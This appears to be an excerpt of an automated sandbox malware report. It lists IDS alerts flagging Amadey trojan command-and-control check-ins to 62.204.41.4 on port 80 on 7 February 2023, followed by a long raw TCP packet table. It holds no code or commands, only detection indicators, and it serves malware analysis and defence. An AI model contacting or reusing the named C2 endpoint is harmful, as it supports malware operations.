192.168.2.562.204.41.449803802027700 02/07/23-19:57:32.447940	TCP	2027700	ET TROJAN Amadey CnC Check-In	49803	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450097802027700 02/07/23-19:58:53.510976	TCP	2027700	ET TROJAN Amadey CnC Check-In	50097	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450015802027700 02/07/23-19:58:31.307259	TCP	2027700	ET TROJAN Amadey CnC Check-In	50015	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450336802027700 02/07/23-19:59:58.703262	TCP	2027700	ET TROJAN Amadey CnC Check-In	50336	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449974802027700 02/07/23-19:58:18.969301	TCP	2027700	ET TROJAN Amadey CnC Check-In	49974	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449977802027700 02/07/23-19:58:19.705616	TCP	2027700	ET TROJAN Amadey CnC Check-In	49977	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450247802027700 02/07/23-19:59:35.069047	TCP	2027700	ET TROJAN Amadey CnC Check-In	50247	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449714802027700 02/07/23-19:57:10.084490	TCP	2027700	ET TROJAN Amadey CnC Check-In	49714	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449885802027700 02/07/23-19:57:55.454532	TCP	2027700	ET TROJAN Amadey CnC Check-In	49885	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450155802027700 02/07/23-19:59:10.245942	TCP	2027700	ET TROJAN Amadey CnC Check-In	50155	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449888802027700 02/07/23-19:57:56.245210	TCP	2027700	ET TROJAN Amadey CnC Check-In	49888	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449806802027700 02/07/23-19:57:33.169488	TCP	2027700	ET TROJAN Amadey CnC Check-In	49806	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450422802027700 02/07/23-20:00:23.830241	TCP	2027700	ET TROJAN Amadey CnC Check-In	50422	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450425802027700 02/07/23-20:00:24.567398	TCP	2027700	ET TROJAN Amadey CnC Check-In	50425	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449799802027700 02/07/23-19:57:31.508216	TCP	2027700	ET TROJAN Amadey CnC Check-In	49799	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450244802027700 02/07/23-19:59:34.357275	TCP	2027700	ET TROJAN Amadey CnC Check-In	50244	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450333802027700 02/07/23-19:59:57.984722	TCP	2027700	ET TROJAN Amadey CnC Check-In	50333	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449908802027700 02/07/23-19:58:01.073849	TCP	2027700	ET TROJAN Amadey CnC Check-In	49908	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450040802027700 02/07/23-19:58:37.231251	TCP	2027700	ET TROJAN Amadey CnC Check-In	50040	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450199802027700 02/07/23-19:59:20.621768	TCP	2027700	ET TROJAN Amadey CnC Check-In	50199	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449796802027700 02/07/23-19:57:30.765231	TCP	2027700	ET TROJAN Amadey CnC Check-In	49796	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450288802027700 02/07/23-19:59:47.126534	TCP	2027700	ET TROJAN Amadey CnC Check-In	50288	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450308802027700 02/07/23-19:59:51.952268	TCP	2027700	ET TROJAN Amadey CnC Check-In	50308	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450158802027700 02/07/23-19:59:10.996736	TCP	2027700	ET TROJAN Amadey CnC Check-In	50158	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450028802027700 02/07/23-19:58:34.553699	TCP	2027700	ET TROJAN Amadey CnC Check-In	50028	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450069802027700 02/07/23-19:58:46.668672	TCP	2027700	ET TROJAN Amadey CnC Check-In	50069	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449920802027700 02/07/23-19:58:04.285165	TCP	2027700	ET TROJAN Amadey CnC Check-In	49920	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450349802027700 02/07/23-20:00:04.188949	TCP	2027700	ET TROJAN Amadey CnC Check-In	50349	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449831802027700 02/07/23-19:57:39.071348	TCP	2027700	ET TROJAN Amadey CnC Check-In	49831	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450219802027700 02/07/23-19:59:28.398284	TCP	2027700	ET TROJAN Amadey CnC Check-In	50219	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449701802027700 02/07/23-19:57:04.541289	TCP	2027700	ET TROJAN Amadey CnC Check-In	49701	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449742802027700 02/07/23-19:57:16.147994	TCP	2027700	ET TROJAN Amadey CnC Check-In	49742	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450012802027700 02/07/23-19:58:30.553987	TCP	2027700	ET TROJAN Amadey CnC Check-In	50012	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450361802027700 02/07/23-20:00:07.031777	TCP	2027700	ET TROJAN Amadey CnC Check-In	50361	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450438802027700 02/07/23-20:00:27.675588	TCP	2027700	ET TROJAN Amadey CnC Check-In	50438	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449819802027700 02/07/23-19:57:36.373215	TCP	2027700	ET TROJAN Amadey CnC Check-In	49819	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449949802027700 02/07/23-19:58:13.013964	TCP	2027700	ET TROJAN Amadey CnC Check-In	49949	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450142802027700 02/07/23-19:59:07.121016	TCP	2027700	ET TROJAN Amadey CnC Check-In	50142	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450101802027700 02/07/23-19:58:54.467418	TCP	2027700	ET TROJAN Amadey CnC Check-In	50101	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450450802027700 02/07/23-20:00:30.549660	TCP	2027700	ET TROJAN Amadey CnC Check-In	50450	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450272802027700 02/07/23-19:59:41.450711	TCP	2027700	ET TROJAN Amadey CnC Check-In	50272	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450231802027700 02/07/23-19:59:31.231345	TCP	2027700	ET TROJAN Amadey CnC Check-In	50231	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450320802027700 02/07/23-19:59:54.828975	TCP	2027700	ET TROJAN Amadey CnC Check-In	50320	80	192.168.2.5	62.204.41.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 7, 2023 19:57:03.546092033 CET	49698	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.546333075 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.605668068 CET	80	49698	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.605837107 CET	49698	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.608742952 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.609515905 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.625298977 CET	49698	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.625893116 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.684655905 CET	80	49698	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.684715986 CET	80	49698	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.684825897 CET	49698	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.688357115 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.692217112 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.692430019 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.702605963 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.765177965 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765212059 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765239954 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765266895 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765290976 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.765295029 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765325069 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765333891 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.765357018 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765387058 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765396118 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.765418053 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765439034 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.765448093 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765480995 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765492916 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.765548944 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.802165985 CET	49698	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.803030968 CET	49699	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.828742981 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828780890 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828807116 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828826904 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.828830957 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828857899 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828857899 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.828885078 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828902006 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.828911066 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828929901 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.828936100 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828967094 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828972101 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.828982115 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.828999043 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.829029083 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.861804008 CET	80	49698	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.861861944 CET	49698	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.863467932 CET	80	49699	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.863574028 CET	49699	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.880243063 CET	49699	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891520023 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891555071 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891587019 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891617060 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891618013 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891623974 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891650915 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891653061 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891674995 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891681910 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891702890 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891709089 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891721010 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891736031 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891761065 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891777039 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891787052 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891813040 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891813040 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.891849041 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.891874075 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.940934896 CET	80	49699	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.943756104 CET	80	49699	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.943857908 CET	49699	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.954431057 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954458952 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954482079 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954504013 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954525948 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954547882 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954569101 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954591036 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954600096 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.954613924 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954638004 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954653025 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.954659939 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.954675913 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.954719067 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.017163992 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.017234087 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.017262936 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.017290115 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.017316103 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.017343998 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.017353058 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.017374992 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.017405033 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.017410040 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.017431974 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.017436981 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.017461061 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.017471075 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.017488956 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.017514944 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.017515898 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.017544985 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.017569065 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.070588112 CET	49699	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.071268082 CET	49700	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.080046892 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.080090046 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.080108881 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.080131054 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.080152035 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.080173969 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.080193996 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.080197096 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.080214024 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.080235958 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.080257893 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.080279112 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.080288887 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.080306053 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.080319881 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.080334902 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.080382109 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.131252050 CET	80	49699	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.131700993 CET	80	49700	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.131861925 CET	49699	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.131903887 CET	49700	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.142951965 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.143008947 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.143044949 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.143079042 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.143114090 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.143141985 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.143168926 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.143237114 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.269931078 CET	49700	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.330205917 CET	80	49700	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.333868980 CET	80	49700	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.333985090 CET	49700	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.453306913 CET	49700	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.453502893 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.454448938 CET	49701	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.513746023 CET	80	49700	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.516094923 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.516164064 CET	80	49701	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.516263008 CET	49700	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.516350985 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.516359091 CET	49701	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.541289091 CET	49701	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.602893114 CET	80	49701	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.605540991 CET	80	49701	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:04.605689049 CET	49701	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.986406088 CET	49701	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:04.987273932 CET	49702	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:05.047585964 CET	80	49702	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:05.047910929 CET	80	49701	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:05.048676014 CET	49701	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:05.051476955 CET	49702	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:05.106585979 CET	49702	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:05.167802095 CET	80	49702	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:05.172039032 CET	80	49702	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:05.172141075 CET	49702	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:05.920936108 CET	49702	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:05.921545029 CET	49703	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:05.981524944 CET	80	49702	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:05.981754065 CET	49702	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:05.982819080 CET	80	49703	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:05.982971907 CET	49703	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:06.000699997 CET	49703	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:06.062079906 CET	80	49703	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:06.065315962 CET	80	49703	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:06.065468073 CET	49703	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:06.199970961 CET	49703	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:06.200953960 CET	49704	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:06.261465073 CET	80	49703	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:06.261596918 CET	49703	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:06.262425900 CET	80	49704	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:06.262537956 CET	49704	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:06.319925070 CET	49704	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:06.381519079 CET	80	49704	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:06.383476019 CET	80	49704	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:06.383620024 CET	49704	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:06.807857037 CET	49704	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:06.808767080 CET	49705	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:06.869054079 CET	80	49705	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:06.869262934 CET	49705	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:06.869523048 CET	80	49704	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:06.869648933 CET	49704	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:06.909903049 CET	49705	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:06.970223904 CET	80	49705	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:06.972677946 CET	80	49705	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:06.972795010 CET	49705	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.070374966 CET	49705	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.071300983 CET	49706	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.130737066 CET	80	49705	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:08.130765915 CET	80	49706	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:08.130836964 CET	49705	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.130907059 CET	49706	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.141498089 CET	49706	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.202346087 CET	80	49706	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:08.205522060 CET	80	49706	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:08.205605030 CET	49706	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.319792032 CET	49706	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.320671082 CET	49707	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.379584074 CET	80	49706	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:08.379647970 CET	49706	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.382900953 CET	80	49707	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:08.383028984 CET	49707	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.383912086 CET	49707	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.446311951 CET	80	49707	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:08.449425936 CET	80	49707	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:08.449568987 CET	49707	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.557835102 CET	49707	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.558737993 CET	49708	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.618182898 CET	80	49708	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:08.618295908 CET	49708	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.619163990 CET	49708	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.620156050 CET	80	49707	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:08.620218992 CET	49707	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.678395033 CET	80	49708	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:08.681597948 CET	80	49708	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:08.681679964 CET	49708	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.787060976 CET	49708	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.787956953 CET	49709	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.846563101 CET	80	49708	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:08.846657991 CET	49708	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.850538969 CET	80	49709	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:08.850744009 CET	49709	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.852067947 CET	49709	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:08.914628029 CET	80	49709	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:08.917759895 CET	80	49709	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:08.918180943 CET	49709	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.021862984 CET	49709	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.023020983 CET	49710	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.084620953 CET	80	49709	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:09.084794998 CET	49709	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.085386038 CET	80	49710	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:09.085496902 CET	49710	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.099241018 CET	49710	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.162050009 CET	80	49710	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:09.165880919 CET	80	49710	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:09.166111946 CET	49710	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.273161888 CET	49710	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.274077892 CET	49711	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.333892107 CET	80	49711	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:09.335944891 CET	80	49710	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:09.335994959 CET	49711	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.336028099 CET	49710	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.336515903 CET	49711	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.398072958 CET	80	49711	62.204.41.4	192.168.2.5
